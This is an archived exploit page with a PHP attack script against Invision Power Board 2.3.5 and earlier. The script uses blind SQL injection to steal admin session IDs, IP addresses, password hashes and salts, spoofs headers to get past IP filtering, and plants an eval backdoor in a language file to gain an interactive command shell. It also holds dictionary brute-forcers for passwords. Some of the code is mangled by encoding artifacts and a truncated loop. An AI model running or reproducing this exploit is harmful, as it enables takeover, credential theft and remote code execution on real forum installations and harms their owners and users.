TUCoPS :: Web BBS :: Frequently Exploited :: va1092.htm

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
Invision Power Board <= 2.3.5 Multiple Vulnerabilities
Invision Power Board <= 2.3.5 Multiple Vulnerabilities


#!/usr/bin/php -q=0D
mhead();=0D
		=0D
		# Gimme your args=0D
		$this->p_attack = $this->get_p('attack', true);=0D
		$this->p_prox   = $this->get_p('proxhost');=0D
		$this->p_proxa  = $this->get_p('proxauth');=0D
		=0D
		$this->init_global();=0D
		=0D
		# Proxy params=0D
		if( $this->p_prox )=0D
		{=0D
			$this->web->proxy($this->p_prox);=0D
			=0D
			if( $this->p_proxa )=0D
			$this->web->proxyauth($this->p_proxa);=0D
		}=0D
=0D
		# Where do we go ?=0D
		switch( $this->p_attack )=0D
		{=0D
			case 1:	 $this->code_exec();  break;=0D
			case 2;  $this->bf_sql_pwd(); break;=0D
			case 3:  $this->bf_usr_pwd(); break;=0D
			default: $this->usage();=0D
		}=0D
=0D
		return;=0D
	}=0D
	=0D
	function code_exec($loop=1)=0D
	{=0D
		# First loop=0D
		if( $loop == 1 )=0D
		{=0D
			$this->set_sql_param();=0D
			$this->set_sql_focus();=0D
		=0D
			$this->p_acp = $this->get_p('acp');=0D
				=0D
			# ACP path=0D
			if( !$this->p_acp )=0D
			{=0D
				# If the user changed the ACP directory, we can=0D
				# find it (if the "Remove ACP Link" option was not=0D
				# applied) by log in as an Admin, and then click=0D
				# on "Admin CP". This can be done with a user=0D
				# but I didn't implemented that ;)=0D
				$this->msg('Using default ACP path: admin', 1);=0D
				$this->p_acp = 'admin';=0D
			}=0D
			else =0D
			$this->msg('Using ACP path "'.$this->p_acp.'"', 1);=0D
		=0D
			# Init client headers:=0D
			# Only if we have the same IP as the targeted user (not admin),=0D
			# it resets session datas, so we try to spoof our =0D
			# IP as a random one in order to keep user's session datas while=0D
			# we bruteforce SQL fields.=0D
			$this->bypass_matches();=0D
		=0D
			# Remove expired sessions ( time() - 60*60*2  =  > 2 hours )=0D
			$this->web->get($this->p_url.$this->p_acp.'/index.php?');=0D
			$this->msg('Removed all out of date admin sessions', 1);=0D
		=0D
			# Cookie prefix=0D
			$this->get_cprefix();=0D
		}=0D
				=0D
		# Admin session ?=0D
		$this->msg('Trying to find an admin session id', 0);=0D
		=0D
		# Got one :]=0D
		if( $this->get_admin_sess() )=0D
		{=0D
			$this->s_admin = true;=0D
			$this->s_sess  = $this->data['a_sess_id'];=0D
			$this->a_url   = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess;=0D
		}=0D
		=0D
		# Nothing special=0D
		else =0D
		{=0D
			$this->s_admin = false;=0D
			$this->msg('No admin session id found', -1);=0D
		}=0D
		=0D
		# User session ?=0D
		if( !$this->s_sess )=0D
		{=0D
			$this->msg('Trying to find a user session id', 0);=0D
			=0D
			# Yep=0D
			if( $this->get_user_sess() )=0D
			$this->s_sess = $this->data['u_sess_id'];=0D
=0D
			# F0ck=0D
			else =0D
			{=0D
				$this->msg('No user session id found', -1);=0D
				$this->msg('Admin session > 2 hours or user logged out', 0);=0D
				$this->msg('Keeping trying until the user connects', 0);=0D
				$this->msg('Entering loop #'.$loop.' ...', 0);=0D
				$this->code_exec(++$loop);=0D
			}=0D
		}=0D
			=0D
		$this->msg('Getting security options', 0);=0D
		=0D
		# Security options=0D
		$this->get_sec_options();=0D
		=0D
		# IP filter ?=0D
		if( $this->conf['ip'] === '1' )=0D
		{=0D
			$this->s_bypass = true;=0D
			=0D
			$this->msg('IP filter option is turned on', 0);=0D
			=0D
			# Spoofing protection ?=0D
			if( !$this->conf['xforward'] )=0D
			{=0D
				# Assuming our IP isn't the same etc..=0D
				$this->msg('Can\'t bypass the IP filter', -1);=0D
				exit(1);=0D
			}=0D
			=0D
			# X-Forwarded-For / Client-IP /=0D
			# Proxy-User / X-Cluster-Client-IP=0D
			else =0D
			{=0D
				$this->msg('Cool, we can spoof our IP (Client-IP)', 1);=0D
				=0D
				if( $this->s_admin )=0D
				{=0D
					$this->msg('Trying to find admin\'s last IP', 0);=0D
					=0D
					# Admin IP found=0D
					$this->get_admin_ip();=0D
					$this->s_ip = $this->data['a_ip_addr'];=0D
				}=0D
				else =0D
				{=0D
					$this->s_admin = false;=0D
					$this->msg('Trying to find user\'s last used IP', 0);=0D
					=0D
					# User IP found=0D
					$this->get_user_ip();=0D
					$this->s_ip = $this->data['u_ip_addr'];=0D
				}=0D
				=0D
				# Nothing found=0D
				if( !$this->s_ip )=0D
				{=0D
					# Ahah (:=0D
					$this->msg('No IP found for this user', -1);=0D
					$this->give_hope();=0D
				}=0D
				=0D
				# Got one !=0D
				else=0D
				$this->msg('Ok, using IP '.$this->s_ip, 1);=0D
			}=0D
		}=0D
		=0D
		# User-Agent filter ?=0D
		if( $this->conf['browser'] === '1' && !$this->s_admin )=0D
		{=0D
			$this->s_bypass = true;=0D
			=0D
			$this->msg('Trying to find a valid user-agent', 0);=0D
			=0D
			# Good=0D
			if( $this->get_user_agent() )=0D
			{=0D
				$this->msg('Ok, using user-agent '.substr($this->data['u_agent'], 0, 10).'...', 1);=0D
				$this->s_agent = $this->data['u_agent'];=0D
			}=0D
			=0D
			# WTF :!=0D
			else=0D
			{=0D
				$this->msg('No user-agent found for this user', -1);=0D
				$this->msg('Maybe the browser didn\'t send this header', 0);=0D
				$this->s_agent = '';=0D
			}=0D
			=0D
		}=0D
=0D
		# Cool !?=0D
		if( !$this->s_bypass )=0D
		$this->msg('Cool, nothing to bypass', 1);=0D
		=0D
		$this->msg('Trying to log in', 0);=0D
		=0D
		# Owned =]=0D
		if( $this->is_logged() )=0D
		{=0D
			# PHP code=0D
			if( $this->s_admin )=0D
			{=0D
				$this->msg('Logged in with an admin session', 1);=0D
				$this->exec_code();=0D
			}=0D
			=0D
			# Normal user ?=0D
			else=0D
			{=0D
				$this->msg('Logged in with a user session', 1);=0D
				$this->msg('You can log in using the cookie session_id', 1);=0D
=0D
				if( $this->s_ip !== $this->def_ip )=0D
				$this->msg('Set the Client-IP header to: '.$this->s_ip, 1);=0D
				=0D
				if( $this->s_agent )=0D
				$this->msg('Set the User-Agent header to: '.$this->s_agent, 1);=0D
				=0D
				exit(0);=0D
			}=0D
		}=0D
		else =0D
		{=0D
			# Even if the admin logged out .. the admin session=0D
			# is still valid ;)=0D
			$this->msg('Can\'t log in, the session has expired ?!', -1);=0D
			$this->give_hope();=0D
		}=0D
		=0D
		return;=0D
	}=0D
	=0D
	function bf_sql_pwd()=0D
	{=0D
		$this->p_ip    = $this->get_p('ip', true);=0D
		$this->p_dict  = $this->get_p('dict', true);=0D
		=0D
		$this->p_sql_u = $this->get_p('sqlusr');=0D
		=0D
		$this->p_url   = $this->get_p('url');=0D
		$this->p_uname = $this->get_p('uname');=0D
		$this->p_pwd   = $this->get_p('pwd');=0D
		// or =0D
		$this->p_uid   = $this->get_p('uid');=0D
		$this->p_hash  = $this->get_p('passhash');=0D
		$this->p_shold = $this->get_p('stronghold');=0D
		=0D
		if( $this->p_uname && $this->p_pwd && $this->p_url )=0D
		{=0D
			$this->get_cprefix();=0D
			=0D
			$this->msg('Trying to get some cookies', 0);=0D
			=0D
			$g_dat = 'index.php?act=Login&CODE=01&CookieDate=1';=0D
			$p_dat = 'UserName='.$this->p_uname.'&PassWord='.$this->p_pwd.'&x=0&y=0';=0D
		=0D
			$this->web->post($this->p_url.$g_dat, $p_dat);=0D
		=0D
			$this->p_uid   = $this->web->cookie[$this->s_cprefix.'member_id'];=0D
			$this->p_hash  = $this->web->cookie[$this->s_cprefix.'pass_hash'];=0D
			$this->p_shold = $this->web->cookie[$this->s_cprefix.'ipb_stronghold'];=0D
		}=0D
		elseif( !$this->p_uid || !$this->p_hash || !$this->p_shold )=0D
		$this->usage();=0D
		=0D
		if( !$this->p_uid || !$this->p_hash || !$this->p_shold )=0D
		{=0D
			$this->msg('Can\'t get cookies', -1);=0D
			$this->msg('You should try with other parameters', -1);=0D
			exit(1);=0D
		}=0D
		=0D
		$this->msg('Ok, using cookies:', 1);=0D
		=0D
		$this->msg('member_id='.$this->p_uid, 1);=0D
		$this->msg('pass_hash='.$this->p_hash, 1);=0D
		$this->msg('ipb_stronghold='.$this->p_shold, 1);=0D
		=0D
		if( !$this->p_sql_u )=0D
		{=0D
			$this->set_sql_param();=0D
			=0D
			$this->msg('Trying to get the current sql user', 0);=0D
			=0D
			if( !$this->get_sql_user() )=0D
			{=0D
				$this->msg('Can\'t get the sql user', -1);=0D
				$this->msg('If you know the sql user, use -sqlusr', -1);=0D
				exit(1);=0D
			}=0D
			else=0D
			$this->p_sql_u = $this->data['sql_user'];=0D
		}=0D
		=0D
		$this->msg('Ok, using sql user '.$this->p_sql_u, 1);=0D
		=0D
		$dico_c = file($this->p_dict);=0D
		$ip_a   = explode('.', $this->p_ip);=0D
		=0D
		$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);=0D
		$this->msg('You should take a drink ...', 0);=0D
		=0D
		foreach( $dico_c as $line )=0D
		{=0D
			$md5 = md5(trim($line).$this->p_sql_u);=0D
			$md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5;=0D
			$md5 = md5($md5);=0D
=0D
			if( $this->p_shold === $md5 )=0D
			{=0D
				$this->msg('Found something cool =]', 1);=0D
				$this->msg('SQL password: '.$line, 1);=0D
				exit(1);=0D
			}=0D
=0D
		}=0D
		=0D
		$this->msg('End of the wordlist, password not found', -1);=0D
		=0D
		return;=0D
	}=0D
=0D
	function bf_usr_pwd()=0D
	{=0D
		$this->p_dict  = $this->get_p('dict', true);=0D
=0D
		$this->p_hash  = $this->get_p('passhash');=0D
		$this->p_salt  = $this->get_p('salt');=0D
		=0D
		if( !$this->p_hash || !$this->p_salt )=0D
		{=0D
			$this->set_sql_param();=0D
			$this->set_sql_focus();=0D
		}=0D
		=0D
		if( !$this->p_hash )=0D
		{=0D
			$this->msg('Trying to get the password hash', 0);=0D
			=0D
			if( !$this->get_pass_hash() )=0D
			{=0D
				$this->msg('Can\'t get the password hash', -1);=0D
				exit(1);=0D
			}=0D
			else =0D
			$this->p_hash = $this->data['pass_hash'];=0D
		}=0D
		=0D
		$this->msg('Ok, using hash '.$this->p_hash, 1);=0D
		=0D
		if( !$this->p_salt )=0D
		{=0D
			$this->msg('Trying to get the password salt', 0);=0D
			=0D
			if( !$this->get_pass_salt() )=0D
			{=0D
				$this->msg('Can\'t get the password salt', -1);=0D
				exit(1);=0D
			}=0D
			else =0D
			$this->p_salt = $this->data['pass_salt'];=0D
		}=0D
		=0D
		$this->msg('Ok, using salt '.$this->p_salt, 1);=0D
		=0D
		$dico_c = file($this->p_dict);=0D
		=0D
		$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);=0D
		$this->msg('You should take a drink ...', 0);=0D
		=0D
		foreach( $dico_c as $line )=0D
		{=0D
			if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) )=0D
			{=0D
				$this->msg('Found something cool =]', 1);=0D
				$this->msg('User password: '.$line, 1);=0D
				exit(1);=0D
			}=0D
		}=0D
		=0D
		$this->msg('End of the wordlist, password not found', -1);=0D
		=0D
		return;=0D
	}=0D
	=0D
	function set_sql_param()=0D
	{=0D
		$this->p_url   = $this->get_p('url', true);=0D
		$this->p_pre   = $this->get_p('prefix');=0D
		=0D
		# Table prefix=0D
		if( !$this->p_pre )=0D
		{=0D
			# Default table prefix if not precised=0D
			$this->msg('Using default table prefix: ibf_', 1);=0D
			$this->p_pre = 'ibf_';=0D
		}=0D
		else =0D
		$this->msg('Using table prefix '.$this->p_pre, 1);=0D
=0D
	}=0D
	=0D
	function set_sql_focus()=0D
	{=0D
		$this->p_uname = $this->get_p('uname');=0D
		$this->p_uid   = $this->get_p('uid');=0D
		=0D
		if( $this->p_uname )=0D
		$this->msg('Using targeted username '.$this->p_uname, 1);=0D
		=0D
		elseif( $this->p_uid )=0D
		$this->msg('Using targeted user id '.$this->p_uid, 1);=0D
		=0D
		# Target=0D
		if( !($this->p_uname || $this->p_uid) )=0D
		{=0D
			# Default uid if not precised=0D
			$this->msg('Using default user id: 1', 1);=0D
			$this->p_uid = 1;=0D
		}=0D
=0D
		# Focus on ?=0D
		if( $this->p_uname )=0D
		$this->t_on = 'members_l_username=\''.addslashes($this->p_uname).'\'';=0D
		=0D
		else =0D
		$this->t_on = 'id='.(int)$this->p_uid;=0D
		=0D
		return;=0D
	}=0D
	=0D
	function exec_code()=0D
	{=0D
		$this->write_code();=0D
		=0D
		while( $this->cmd_prompt() )=0D
		{=0D
			$this->web->addheader('My-Code', $this->cmd);=0D
			$this->web->get($this->p_url);=0D
=0D
			print "\n".$this->get_answer();=0D
		}=0D
		=0D
		exit(0);=0D
	}=0D
	=0D
	function get_answer()=0D
	{=0D
		$res_a = explode($this->res_sep, $this->web->getcontent());=0D
		=0D
		if( !$res_a[1] )=0D
		return 'No result to retrieve';=0D
		=0D
		else =0D
		return $res_a[1];=0D
	}=0D
	=0D
	function cmd_prompt()=0D
	{=0D
		$this->cmd = $this->msg('root@ipb: ', 1, 1, 0, true);=0D
		=0D
		if( !ereg('^(quit|exit)$', $this->cmd) )=0D
		{		=0D
			$this->cmd = base64_encode($this->cmd);=0D
			$this->cmd = str_replace('%CMD%', $this->cmd, $this->php_send);=0D
			=0D
			return TRUE;=0D
		}=0D
=0D
		else=0D
		   return FALSE;=0D
	}=0D
	=0D
	function write_code()=0D
	{=0D
		# Gimme the language ID=0D
		$this->get_def_lang();=0D
		=0D
		# Current lang settings=0D
		$p_dat ==0D
		'code=edit2&act=lang&id='.$this->g_lid.'§ion'.=0D
		'=lookandfeel&lang_file=lang_boards.php';=0D
		=0D
		$this->web->post($this->a_url, $p_dat);=0D
=0D
		# We collect each variable name / value=0D
		if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) )=0D
		{=0D
			# POST data =0D
			$p_dat ==0D
			'code=doedit&act=lang&id='.$this->g_lid.=0D
			'&lang_file=lang_boards.php§ion=lo'.=0D
			'okandfeel&';=0D
=0D
			# &Name=Value=0D
			for( $i=0; $imsg('Can\'t find block variables', 0);=0D
			exit(1);=0D
		}=0D
		=0D
		return;=0D
	}=0D
	=0D
	function get_def_lang()=0D
	{=0D
		$this->msg('Trying to get the set language id', 0);=0D
		=0D
		$this->web->get($this->a_url.'§ion=lookandfeel&act=lang');=0D
		=0D
		if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) )=0D
		{=0D
			$this->g_lid = $lids[1];=0D
			$this->msg('Using language id '.$this->g_lid, 1);=0D
		}=0D
		else =0D
		{=0D
			$this->msg('Can\'t get the default language id', -1);=0D
			exit(1);=0D
		}=0D
		=0D
		return;=0D
	}=0D
	=0D
	function is_logged()=0D
	{=0D
		$this->bypass_matches();=0D
=0D
		# User session ok ?=0D
		if( !$this->s_admin )=0D
		{=0D
			$match = 'act=Login&CODE=03';=0D
			$this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess);=0D
			$this->web->get($this->p_url);=0D
		}=0D
		=0D
		# Admin session ok ?=0D
		else=0D
		{=0D
			$match = '§ion=';=0D
			$this->web->get($this->a_url);=0D
		}=0D
		=0D
		if( preg_match("/$match/i", $this->web->getcontent()) )=0D
		return true;=0D
		=0D
		else =0D
		return false;		=0D
	}=0D
	=0D
	function bypass_matches()=0D
	{=0D
		# match_browser=0D
		$this->web->agent($this->s_agent);=0D
		=0D
		# match_ipaddress=0D
		$this->web->addheader('Client-IP', $this->s_ip);=0D
		=0D
		return;=0D
	}=0D
	=0D
	function get_cprefix()=0D
	{=0D
		$this->msg('Trying to get the cookie prefix', 0);=0D
				=0D
		# Set-Cookie: session_id=...; path=/=0D
		$this->web->get($this->p_url);=0D
		=0D
		$this->s_cprefix = '';=0D
		=0D
		if( $this->web->cookie )=0D
		{=0D
			foreach( $this->web->cookie as $name => $value)=0D
			{=0D
				if( preg_match($this->reg_cpre, $name, $cmatches) )=0D
				{=0D
					$this->s_cprefix = $cmatches[1];=0D
					break;=0D
				}=0D
			}=0D
		}=0D
		=0D
		if( !$this->s_cprefix )=0D
		$this->msg('No cookie prefix set', 1);=0D
		=0D
		else =0D
		$this->msg('Using cookie prefix '.$this->s_cprefix, 1);=0D
		=0D
		return;=0D
	}=0D
	=0D
	function get_sec_options()=0D
	{=0D
		# If no value, take the default one=0D
		$this->get_conf('t.conf_value');=0D
		$this->get_conf('t.conf_default');=0D
		=0D
		return;=0D
	}=0D
	=0D
	function get_conf($field)=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_table = 'conf_settings';	=0D
		$this->t_field = $field;=0D
		$this->t_char  = $this->chr_num;=0D
		=0D
		$this->t_add_0 = "AND t.conf_key='match_browser'";=0D
=0D
		if( $this->conf['browser'] === '' )=0D
		$this->conf['browser'] = $this->bf_inj();=0D
=0D
		$this->t_add_0 = "AND t.conf_key='match_ipaddress'";=0D
		=0D
		if( $this->conf['ip'] === '' )=0D
		$this->conf['ip'] = $this->bf_inj();=0D
		=0D
		$this->t_add_0 = "AND t.conf_key='xforward_matching'";=0D
		=0D
		if( $this->conf['xforward'] === '' )=0D
		$this->conf['xforward'] = $this->bf_inj();=0D
=0D
		return;=0D
	}=0D
	=0D
	function get_login_key()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'login_key';=0D
		$this->t_table           = 'members';=0D
		$this->t_field           = 't.member_login_key';=0D
		$this->t_join            = 't.id=m.id';=0D
		$this->t_char            = $this->chr_md5;=0D
		$this->data['login_key'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_sql_user()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'user()';=0D
		$this->t_table           = 'members';=0D
		$this->t_field           = 'user()';=0D
		$this->t_char            = $this->chr_all;=0D
		$this->t_end             = '@';=0D
		$this->data['sql_user']  = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_pass_hash()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'pass_hash';=0D
		$this->t_table           = 'members_converge';=0D
		$this->t_field           = 't.converge_pass_hash';=0D
		$this->t_join            = 't.converge_email=m.email';=0D
		$this->t_char            = $this->chr_md5;=0D
		$this->data['pass_hash'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_pass_salt()=0D
	{	=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'pass_salt';=0D
		$this->t_table           = 'members_converge';=0D
		$this->t_field           = 't.converge_pass_salt';=0D
		$this->t_join            = 't.converge_email=m.email';=0D
		$this->t_char            = $this->chr_all;=0D
		$this->data['pass_salt'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_admin_sess()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'admin_sid';=0D
		$this->t_table           = 'admin_sessions';=0D
		$this->t_field           = 't.session_id';=0D
		$this->t_join            = 't.session_member_id=m.id';=0D
		$this->t_sel             = 't.session_log_in_time';=0D
		$this->t_char            = $this->chr_md5;=0D
		$this->data['a_sess_id'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_admin_ip()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'admin_ip';=0D
		$this->t_table           = 'admin_sessions';=0D
		$this->t_field           = 't.session_ip_address';=0D
		$this->t_join            = 't.session_member_id=m.id';=0D
		$this->t_sel             = 't.session_log_in_time';=0D
		$this->t_char            = $this->chr_ip;=0D
		$this->data['a_ip_addr'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_admin_pwd()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'admin_pwd';=0D
		$this->t_table           = 'admin_login_logs';=0D
		$this->t_field           = 't.admin_post_details';=0D
		$this->t_join            = 't.admin_username=m.members_l_username';=0D
		$this->t_sel             = 't.admin_id';=0D
		$this->t_end             = '"';=0D
		$this->t_bchar           = -4; # ";}}=0D
		$this->t_char            = $this->chr_all;=0D
		$this->data['a_pwd_like']= $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_user_sess()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'user_sid';=0D
		$this->t_table           = 'sessions';=0D
		$this->t_field           = 't.id';=0D
		$this->t_join            = 't.member_id=m.id';=0D
		$this->t_sel             = 't.running_time';=0D
		$this->t_char            = $this->chr_md5;=0D
		$this->data['u_sess_id'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_user_ip()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'user_ip';=0D
		$this->t_table           = 'sessions';=0D
		$this->t_field           = 't.ip_address';=0D
		$this->t_join            = 't.member_id=m.id';=0D
		$this->t_sel             = 't.running_time';=0D
		$this->t_char            = $this->chr_ip;=0D
		$this->data['u_ip_addr'] = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function get_user_agent()=0D
	{=0D
		$this->init_sql();=0D
		=0D
		$this->t_key             = 'user_agent';=0D
		$this->t_table           = 'sessions';=0D
		$this->t_field           = 't.browser';=0D
		$this->t_join            = 't.member_id=m.id';=0D
		$this->t_sel             = 't.running_time';=0D
		$this->t_char            = $this->chr_all;=0D
		$this->data['u_agent']   = $this->bf_inj();=0D
		=0D
		return $this->key_val;=0D
	}=0D
	=0D
	function init_sql()=0D
	{=0D
		# SQL Injection params=0D
		$this->t_end   = null;=0D
		$this->t_add_0 = '';=0D
		$this->t_add_1 = '';=0D
		$this->t_sel   = '1';=0D
		$this->t_bchar = 0;=0D
		$this->t_join  = '';=0D
		$this->t_key   = '';=0D
		$this->t_add_1 = 'ORDER BY id DESC LIMIT 1';=0D
		=0D
		return;=0D
	}=0D
	=0D
	function init_global()=0D
	{=0D
		# Charsets=0D
$this->chr_spe = str_split(' :/;*(-.!,?=A7*=B5=F9%$=A3^=A8=+})=B0]=E0=E7^_\\`=E8|[\'{#=E9~&=B2"@');=0D 
		$this->chr_num = range(0, 9);=0D
		$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );=0D
		$this->chr_ip  = array_merge( $this->chr_num, array('.') );=0D
		$this->chr_all = array_merge( $this->chr_num, range('a', 'z') );=0D
		$this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );=0D
=0D
		# SQL Injection=0D
		$this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';=0D
		$this->def_inj   = "' OR 1=\"'\" UNION %rep_req% OR 1=\"'\" %rep_add% #";=0D
		=0D
		# Results=0D
		$this->data = array();=0D
		$this->conf = array('ip' => '', 'browser' => '', 'xforward' => '');=0D
		=0D
		# Misc=0D
		$this->stat     = array(-1 => '-', 0 => '/', 1 => '+');=0D
		$this->s_bypass = false;=0D
		$this->res_sep  = md5(rand());=0D
		$this->def_ip   = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);=0D
		=0D
		# PHP Code=0D
		$this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';=0D
		$this->php_send	 = "print('$this->res_sep');@system(base64_decode('%CMD%'));";=0D
		$this->php_send .= "print('$this->res_sep');exit(0);";=0D
		=0D
		# Regex=0D
		$this->reg_lang = '#[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';=0D
		$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)#i";=0D
		$this->reg_cpre = '#^(.*)session_id$#';=0D
		# $this->reg_acp  = '#s_agent = 'Mozilla Firefox';=0D
		$this->s_ip    = $this->def_ip;=0D
		=0D
		return;=0D
	}=0D
	=0D
	function bf_inj()=0D
	{=0D
		$this->sub_chr = $this->t_bchar;=0D
		$this->key_val = '';=0D
			=0D
		if( !empty($this->t_key) )=0D
		$this->msg('', 0);=0D
		=0D
		while( true )=0D
		{=0D
			if( $this->t_bchar < 0 )=0D
			$this->sub_chr--;=0D
			=0D
			else=0D
			$this->sub_chr++;=0D
	=0D
			# 0-9a-f=0D
			for( $j=0;$j<=count($this->t_char);$j++ )=0D
			{=0D
				# That one ?=0D
				$chr = $this->t_char[$j];=0D
				=0D
				# Latest char ?=0D
				if( $j === count($this->t_char) )=0D
				$chr = $this->t_end;=0D
				=0D
				# Ascii num=0D
				$asc = ord($chr);=0D
				=0D
				# Screen bug=0D
				if( !empty($this->t_key) ) =0D
				{=0D
					$msg  = $this->t_key.'='.$this->key_val;=0D
					$msg .= ($chr === $this->t_end ? "\x20" : $chr);=0D
					=0D
					$this->msg($msg, 0, 1, 1);=0D
				}=0D
				=0D
				# Focus on the target ?=0D
				if( !empty($this->t_join) )=0D
				{=0D
					$inj = =0D
					'SELECT 1,'.$this->t_sel.' FROM '.$this->p_pre.$this->t_table.=0D
					' t, '.$this->p_pre.'members m WHERE '.$this->t_join.=0D
					' AND m.'.$this->t_on.' AND ASCII(SUBSTR('.$this->t_field.=0D
					','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;=0D
				}=0D
				else =0D
				{=0D
					$inj ==0D
					'SELECT 1,'.$this->t_sel.' FROM '.$this->p_pre.$this->t_table.=0D
					' t WHERE ASCII(SUBSTR('.$this->t_field.','.$this->sub_chr.=0D
					',1))='.$asc.' '.$this->t_add_0;=0D
				}=0D
=0D
				# SQL Injection via rawurldecode()=0D
				$inj = str_replace('%rep_req%', $inj, $this->def_inj);=0D
				$inj = str_replace('%rep_add%', $this->t_add_1, $inj);=0D
				$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);=0D
				=0D
				# Params=0D
				$inj = str_replace('%rep_inj%', $inj, $this->def_param);=0D
				$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);=0D
				=0D
				$this->web->get($this->p_url.$inj);=0D
=0D
				# Ok !?=0D
				if( !strstr($this->web->getcontent(), 'notfound') )=0D
				{=0D
					if( $chr !== $this->t_end )=0D
					{	=0D
						$this->key_val .= $chr;=0D
						break;=0D
					}=0D
				}=0D
				=0D
				# End=0D
				if( $chr === $this->t_end )=0D
				{=0D
					# Reverse=0D
					if( $this->t_bchar < 0 )=0D
					$this->key_val = strrev($this->key_val);=0D
					=0D
					if( !empty($this->t_key) ) =0D
					$this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);=0D
=0D
					return $this->key_val;=0D
				}=0D
			}=0D
		}=0D
		=0D
	}=0D
		=0D
	function get_p($p, $exit=false)=0D
	{=0D
		global $argv;=0D
		=0D
		foreach( $argv as $key => $value )=0D
		{=0D
			if( $value === '-'.$p )=0D
			{=0D
				if( isset($argv[$key+1]) && !empty($argv[$key+1]) )=0D
				{					=0D
					return $argv[$key+1];=0D
				}=0D
				else=0D
				{=0D
					if( $exit )=0D
					$this->usage();=0D
					=0D
					return true;=0D
				}=0D
			}=0D
		}=0D
		=0D
		if( $exit )=0D
		$this->usage();=0D
		=0D
		return false;=0D
	}=0D
	=0D
	function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)=0D
	{=0D
		if( $ndel ) $type = "\r";=0D
		else        $type = "\n";=0D
		=0D
		# wtf (:=0D
		print=0D
		(=0D
			$type.str_repeat("\x20", $nspace).=0D
			$this->stat[$nstatus]."\x20".$msg=0D
		);=0D
		=0D
		if( $ask )=0D
		return trim(fgets(STDIN));=0D
	}=0D
	=0D
	function give_hope()=0D
	{				=0D
		$this->msg('You should try with another user or try another time', -1);=0D
			=0D
		exit(1);=0D
	}=0D
	=0D
	function mhead()=0D
	{=0D
# Advisory: http://acid-root.new.fr/?0:18=0D 
		=0D
		print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";=0D
		print "\n ------------------------------------------------------";=0D
		print "\n\n About:";=0D
		print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";=0D
print "\n http://acid-root.new.fr/";=0D 
print "\n #acidroot@irc.worldnet.net";=0D 
		print "\n\n\n Attack(s):\n";=0D
		=0D
		return;=0D
	}=0D
	=0D
	function usage()=0D
	{=0D
=0D
		print "\n -attack   [options]\n\n";=0D
		print "  1 - PHP code execution\n\n";=0D
		print "    -url        IPB url with ending slash\n\n";=0D
		print "    -uname      targeted username\n";=0D
		print "    -uid        OR the targeted user id (def: 1)\n\n";=0D
		print "    -prefix     sql table prefix (def: ibf_)\n";=0D
		print "    -acp        admin control panel path (def: admin)\n\n\n";=0D
		print "  2 - Insecure SQL password usage\n\n";=0D
		print "    -ip         your current IP\n";=0D
		print "    -dict       a wordlist file\n\n";=0D
		print "    -url        IPB url with ending slash\n";=0D
		print "    -uname      a valid member username\n";=0D
		print "    -pwd        the associated password\n\n";=0D
		print "    -uid        OR  the targeted member id\n";=0D
		print "    -passhash   the passhash cookie value\n";=0D
		print "    -stronghold the stronghold cookie value\n\n";=0D
		print "    -sqlusr     you can precise the sql user\n";=0D
		print "    -prefix     sql table prefix (def: ibf_)\n\n\n";=0D
		print "  3 - Password bruteforcer\n\n";=0D
		print "    -dict       a wordlist file\n\n";=0D
		print "    -url        IPB url with ending slash\n";=0D
		print "    -uname      targeted username\n";=0D
		print "    -uid        OR  the targeted user id (def: 1)\n";=0D
		print "    -prefix     sql table prefix (def: ibf_)\n\n";=0D
		print "    -passhash   OR the passhash value\n";=0D
		print "    -salt       the salt value\n\n\n";=0D
		print "  Optional: \n\n";=0D
		print "    -proxhost        if you wanna use a proxy\n";=0D
		print "    -proxauth   proxy with authentication\n";=0D
		=0D
		exit(1);=0D
	}=0D
	=0D
}=0D
=0D
$web = new phpsploit;=0D
